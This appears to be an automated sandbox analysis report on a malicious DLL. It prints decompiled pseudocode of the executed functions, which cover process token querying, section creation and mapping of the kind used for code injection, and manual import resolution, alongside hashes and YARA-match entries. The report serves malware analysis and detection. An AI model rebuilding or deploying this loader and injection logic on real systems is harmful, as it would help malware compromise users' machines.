                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8f84
                                                                                                                                                                                                                                0x736d8f46
                                                                                                                                                                                                                                0x736d8f49
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8f49
                                                                                                                                                                                                                                0x736d8efd
                                                                                                                                                                                                                                0x736d8f00
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8f02
                                                                                                                                                                                                                                0x736d8f09
                                                                                                                                                                                                                                0x736d8f0a
                                                                                                                                                                                                                                0x736d8f0c
                                                                                                                                                                                                                                0x736d8f11
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8f11
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                • API String ID: 0-3922119987
                                                                                                                                                                                                                                • Opcode ID: 3a115ccec3ba2cf19ce416712f01ccb0bfa3a07234034750b60847cb87de8cf8
                                                                                                                                                                                                                                • Instruction ID: e10f520f5ffcbd174ee4da33ff10d0a702636923c7cd1ec01184036597b65734
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a115ccec3ba2cf19ce416712f01ccb0bfa3a07234034750b60847cb87de8cf8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1041A471A20314ABDF12DF9AD988B9EBBFDEB89710B14006AE405DB2C4D6718B44DB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Analysis Process: rundll32.exe PID: 7012 Parent PID: 6992 rundll32.exeCOMMON

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 00A6156C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120sleepnativesynchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                			E00A6156C(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E00A61D65();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E00A62020(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E00A61F0A(_t57);
						}
					} while (_v8 != 0);
					_t27 = E00A617CE(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E00A61000(E00A61064,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8);
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E00A614E3(_t53,  &_a4) != 0) {
					 *0xa641b8 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t60 =  *_t68(_t52, 0, 0);
				if(_t60 == 0) {
					L16:
					 *0xa641b8 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E00A62020(_t60 + _t19);
				 *0xa641b8 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60);
				E00A61F0A(_t52);
				goto L18;
			}























                                                                                                                                                                                                                                0x00a61572
                                                                                                                                                                                                                                0x00a61577
                                                                                                                                                                                                                                0x00a6157c
                                                                                                                                                                                                                                0x00a616a7
                                                                                                                                                                                                                                0x00a616a7
                                                                                                                                                                                                                                0x00a61585
                                                                                                                                                                                                                                0x00a61585
                                                                                                                                                                                                                                0x00a61589
                                                                                                                                                                                                                                0x00a6158c
                                                                                                                                                                                                                                0x00a6158d
                                                                                                                                                                                                                                0x00a61593
                                                                                                                                                                                                                                0x00a61597
                                                                                                                                                                                                                                0x00a615ce
                                                                                                                                                                                                                                0x00a61599
                                                                                                                                                                                                                                0x00a615a1
                                                                                                                                                                                                                                0x00a615a7
                                                                                                                                                                                                                                0x00a615a9
                                                                                                                                                                                                                                0x00a615ae
                                                                                                                                                                                                                                0x00a615b4
                                                                                                                                                                                                                                0x00a615b6
                                                                                                                                                                                                                                0x00a615b6
                                                                                                                                                                                                                                0x00a615bd
                                                                                                                                                                                                                                0x00a615c3
                                                                                                                                                                                                                                0x00a615c3
                                                                                                                                                                                                                                0x00a615c7
                                                                                                                                                                                                                                0x00a615c7
                                                                                                                                                                                                                                0x00a615d5
                                                                                                                                                                                                                                0x00a615dc
                                                                                                                                                                                                                                0x00a615e5
                                                                                                                                                                                                                                0x00a615e8
                                                                                                                                                                                                                                0x00a615ee
                                                                                                                                                                                                                                0x00a615f1
                                                                                                                                                                                                                                0x00a615fa
                                                                                                                                                                                                                                0x00a616a3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a616a5
                                                                                                                                                                                                                                0x00a61603
                                                                                                                                                                                                                                0x00a61654
                                                                                                                                                                                                                                0x00a61654
                                                                                                                                                                                                                                0x00a6166a
                                                                                                                                                                                                                                0x00a6166e
                                                                                                                                                                                                                                0x00a61696
                                                                                                                                                                                                                                0x00a61670
                                                                                                                                                                                                                                0x00a61673
                                                                                                                                                                                                                                0x00a61679
                                                                                                                                                                                                                                0x00a6167e
                                                                                                                                                                                                                                0x00a61685
                                                                                                                                                                                                                                0x00a61685
                                                                                                                                                                                                                                0x00a6168c
                                                                                                                                                                                                                                0x00a6168c
                                                                                                                                                                                                                                0x00a61699
                                                                                                                                                                                                                                0x00a6169f
                                                                                                                                                                                                                                0x00a616a1
                                                                                                                                                                                                                                0x00a616a1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a6169f
                                                                                                                                                                                                                                0x00a61610
                                                                                                                                                                                                                                0x00a6164e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a6164e
                                                                                                                                                                                                                                0x00a61612
                                                                                                                                                                                                                                0x00a61617
                                                                                                                                                                                                                                0x00a61620
                                                                                                                                                                                                                                0x00a61624
                                                                                                                                                                                                                                0x00a61646
                                                                                                                                                                                                                                0x00a61646
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61646
                                                                                                                                                                                                                                0x00a61626
                                                                                                                                                                                                                                0x00a6162b
                                                                                                                                                                                                                                0x00a61630
                                                                                                                                                                                                                                0x00a61637
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a6163c
                                                                                                                                                                                                                                0x00a6163f
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A61D65: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A61577), ref: 00A61D74
                                                                                                                                                                                                                                  • Part of subcall function 00A61D65: GetVersion.KERNEL32 ref: 00A61D83
                                                                                                                                                                                                                                  • Part of subcall function 00A61D65: GetCurrentProcessId.KERNEL32 ref: 00A61D9F
                                                                                                                                                                                                                                  • Part of subcall function 00A61D65: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00A61DB8
                                                                                                                                                                                                                                  • Part of subcall function 00A62020: HeapAlloc.KERNEL32(00000000,?,00A61593,00000030,747863F0,00000000), ref: 00A6202C
                                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL ref: 00A615A1
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,00000000,00000030,747863F0,00000000), ref: 00A615E8
                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00A6161E
                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00A6163C
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00A61064,?,00000000), ref: 00A61673
                                                                                                                                                                                                                                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00A61685
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A6168C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00A61064,?,00000000), ref: 00A61694
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A616A1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 3479304935-1084903527
                                                                                                                                                                                                                                • Opcode ID: a44786c88d2219932279ceb5b3464446031c3f644e93e0c4a2a7ae3426093c79
                                                                                                                                                                                                                                • Instruction ID: a4f6db7c31b2a1d6b78e5c3cec612ecd9b32bd52ecbd99d142dcc2c403867519
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a44786c88d2219932279ceb5b3464446031c3f644e93e0c4a2a7ae3426093c79
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F831C47AD00216BBDB21DFA4CC44A9EBEBCEF54750F194122F505D3140EB70CE458BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A96307, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                                                                                                			E00A96307(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00A95157(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00A953BB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                                                                                                                                                                                                0x00a96314
                                                                                                                                                                                                                                0x00a96315
                                                                                                                                                                                                                                0x00a96316
                                                                                                                                                                                                                                0x00a96317
                                                                                                                                                                                                                                0x00a96318
                                                                                                                                                                                                                                0x00a9631c
                                                                                                                                                                                                                                0x00a96323
                                                                                                                                                                                                                                0x00a96332
                                                                                                                                                                                                                                0x00a96335
                                                                                                                                                                                                                                0x00a96338
                                                                                                                                                                                                                                0x00a9633f
                                                                                                                                                                                                                                0x00a96342
                                                                                                                                                                                                                                0x00a96345
                                                                                                                                                                                                                                0x00a96348
                                                                                                                                                                                                                                0x00a9634b
                                                                                                                                                                                                                                0x00a96356
                                                                                                                                                                                                                                0x00a96358
                                                                                                                                                                                                                                0x00a96361
                                                                                                                                                                                                                                0x00a96369
                                                                                                                                                                                                                                0x00a9636b
                                                                                                                                                                                                                                0x00a9637d
                                                                                                                                                                                                                                0x00a96387
                                                                                                                                                                                                                                0x00a9638b
                                                                                                                                                                                                                                0x00a9639a
                                                                                                                                                                                                                                0x00a9639e
                                                                                                                                                                                                                                0x00a963a7
                                                                                                                                                                                                                                0x00a963af
                                                                                                                                                                                                                                0x00a963af
                                                                                                                                                                                                                                0x00a963b1
                                                                                                                                                                                                                                0x00a963b1
                                                                                                                                                                                                                                0x00a963b9
                                                                                                                                                                                                                                0x00a963bf
                                                                                                                                                                                                                                0x00a963c3
                                                                                                                                                                                                                                0x00a963c3
                                                                                                                                                                                                                                0x00a963ce

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00A9634E
                                                                                                                                                                                                                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00A96361
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A9637D
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A9639A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00A963A7
                                                                                                                                                                                                                                • NtClose.NTDLL(?), ref: 00A963B9
                                                                                                                                                                                                                                • NtClose.NTDLL(00000000), ref: 00A963C3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2575439697-0
                                                                                                                                                                                                                                • Opcode ID: e808340f0e32fdf88d7710fe4c3fc13a55649feb7cfe541f92afc3ccdd155c2d
                                                                                                                                                                                                                                • Instruction ID: 7027952b4810234a8b2a67f80b66348bbe2417a8b05aa4d766cff46c9bd2aa1f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e808340f0e32fdf88d7710fe4c3fc13a55649feb7cfe541f92afc3ccdd155c2d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 032125B2A00218BBDF01DFA5CD45EDEBFBDEF08750F104126FA00EA121D7719A459BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A612E2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                			E00A612E2(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00A6138A(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                                                                                                                                                                                                                0x00a612eb
                                                                                                                                                                                                                                0x00a612f2
                                                                                                                                                                                                                                0x00a612f3
                                                                                                                                                                                                                                0x00a612f4
                                                                                                                                                                                                                                0x00a612f5
                                                                                                                                                                                                                                0x00a612f6
                                                                                                                                                                                                                                0x00a61307
                                                                                                                                                                                                                                0x00a6130b
                                                                                                                                                                                                                                0x00a6131f
                                                                                                                                                                                                                                0x00a61322
                                                                                                                                                                                                                                0x00a61325
                                                                                                                                                                                                                                0x00a6132c
                                                                                                                                                                                                                                0x00a6132f
                                                                                                                                                                                                                                0x00a61336
                                                                                                                                                                                                                                0x00a61339
                                                                                                                                                                                                                                0x00a6133c
                                                                                                                                                                                                                                0x00a6133f
                                                                                                                                                                                                                                0x00a61344
                                                                                                                                                                                                                                0x00a6137f
                                                                                                                                                                                                                                0x00a61346
                                                                                                                                                                                                                                0x00a61349
                                                                                                                                                                                                                                0x00a6134f
                                                                                                                                                                                                                                0x00a61354
                                                                                                                                                                                                                                0x00a61358
                                                                                                                                                                                                                                0x00a61376
                                                                                                                                                                                                                                0x00a6135a
                                                                                                                                                                                                                                0x00a61361
                                                                                                                                                                                                                                0x00a6136f
                                                                                                                                                                                                                                0x00a6136f
                                                                                                                                                                                                                                0x00a61358
                                                                                                                                                                                                                                0x00a61387

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 00A6133F
                                                                                                                                                                                                                                  • Part of subcall function 00A6138A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00A61354,00000002,00000000,?,?,00000000,?,?,00A61354,00000002), ref: 00A613B7
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A61361
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                                • Opcode ID: 14dd23b65c741bf67f1e39e3ddc61994533c0620d39a5c637d69a7a96097d9f8
                                                                                                                                                                                                                                • Instruction ID: ac8505bef3e4e1bb551c916203a27309d989e8a78e603871d28f8c97b5b6867a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14dd23b65c741bf67f1e39e3ddc61994533c0620d39a5c637d69a7a96097d9f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7214DB5D00209AFCB11DFA9C8809EEFBF9EF08340F148429E516F7610D730AA058BA4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A616C3, Relevance: 3.1, APIs: 2, Instructions: 92libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A616C3(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0xa641c0;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}




























                                                                                                                                                                                                                                0x00a616c3
                                                                                                                                                                                                                                0x00a616cc
                                                                                                                                                                                                                                0x00a616d1
                                                                                                                                                                                                                                0x00a616d7
                                                                                                                                                                                                                                0x00a616e0
                                                                                                                                                                                                                                0x00a616e6
                                                                                                                                                                                                                                0x00a616e8
                                                                                                                                                                                                                                0x00a616eb
                                                                                                                                                                                                                                0x00a616f0
                                                                                                                                                                                                                                0x00a616f7
                                                                                                                                                                                                                                0x00a616f7
                                                                                                                                                                                                                                0x00a616fb
                                                                                                                                                                                                                                0x00a61701
                                                                                                                                                                                                                                0x00a61706
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a6170c
                                                                                                                                                                                                                                0x00a61716
                                                                                                                                                                                                                                0x00a61718
                                                                                                                                                                                                                                0x00a6171b
                                                                                                                                                                                                                                0x00a6171e
                                                                                                                                                                                                                                0x00a61722
                                                                                                                                                                                                                                0x00a6172a
                                                                                                                                                                                                                                0x00a6172c
                                                                                                                                                                                                                                0x00a6172f
                                                                                                                                                                                                                                0x00a61797
                                                                                                                                                                                                                                0x00a61797
                                                                                                                                                                                                                                0x00a6179b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61734
                                                                                                                                                                                                                                0x00a6173a
                                                                                                                                                                                                                                0x00a6173c
                                                                                                                                                                                                                                0x00a6174f
                                                                                                                                                                                                                                0x00a61752
                                                                                                                                                                                                                                0x00a61752
                                                                                                                                                                                                                                0x00a61752
                                                                                                                                                                                                                                0x00a61756
                                                                                                                                                                                                                                0x00a6173e
                                                                                                                                                                                                                                0x00a6173e
                                                                                                                                                                                                                                0x00a61746
                                                                                                                                                                                                                                0x00a61748
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61748
                                                                                                                                                                                                                                0x00a61736
                                                                                                                                                                                                                                0x00a61736
                                                                                                                                                                                                                                0x00a6174a
                                                                                                                                                                                                                                0x00a6174a
                                                                                                                                                                                                                                0x00a6174a
                                                                                                                                                                                                                                0x00a61759
                                                                                                                                                                                                                                0x00a6175c
                                                                                                                                                                                                                                0x00a6175e
                                                                                                                                                                                                                                0x00a61765
                                                                                                                                                                                                                                0x00a61760
                                                                                                                                                                                                                                0x00a61760
                                                                                                                                                                                                                                0x00a61760
                                                                                                                                                                                                                                0x00a6176d
                                                                                                                                                                                                                                0x00a61773
                                                                                                                                                                                                                                0x00a61775
                                                                                                                                                                                                                                0x00a617a5
                                                                                                                                                                                                                                0x00a61777
                                                                                                                                                                                                                                0x00a61777
                                                                                                                                                                                                                                0x00a6177a
                                                                                                                                                                                                                                0x00a6177c
                                                                                                                                                                                                                                0x00a61784
                                                                                                                                                                                                                                0x00a61784
                                                                                                                                                                                                                                0x00a61789
                                                                                                                                                                                                                                0x00a6178b
                                                                                                                                                                                                                                0x00a61792
                                                                                                                                                                                                                                0x00a61794
                                                                                                                                                                                                                                0x00a61794
                                                                                                                                                                                                                                0x00a61794
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61794
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61775
                                                                                                                                                                                                                                0x00a61724
                                                                                                                                                                                                                                0x00a61724
                                                                                                                                                                                                                                0x00a61728
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61728
                                                                                                                                                                                                                                0x00a617a8
                                                                                                                                                                                                                                0x00a617a8
                                                                                                                                                                                                                                0x00a617af
                                                                                                                                                                                                                                0x00a617b4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a617ba
                                                                                                                                                                                                                                0x00a617c5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a617c5
                                                                                                                                                                                                                                0x00a617bc
                                                                                                                                                                                                                                0x00a617bc
                                                                                                                                                                                                                                0x00a617c2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a617c2
                                                                                                                                                                                                                                0x00a616f0
                                                                                                                                                                                                                                0x00a617c6
                                                                                                                                                                                                                                0x00a617cb

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00A616FB
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00A6176D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2574300362-0
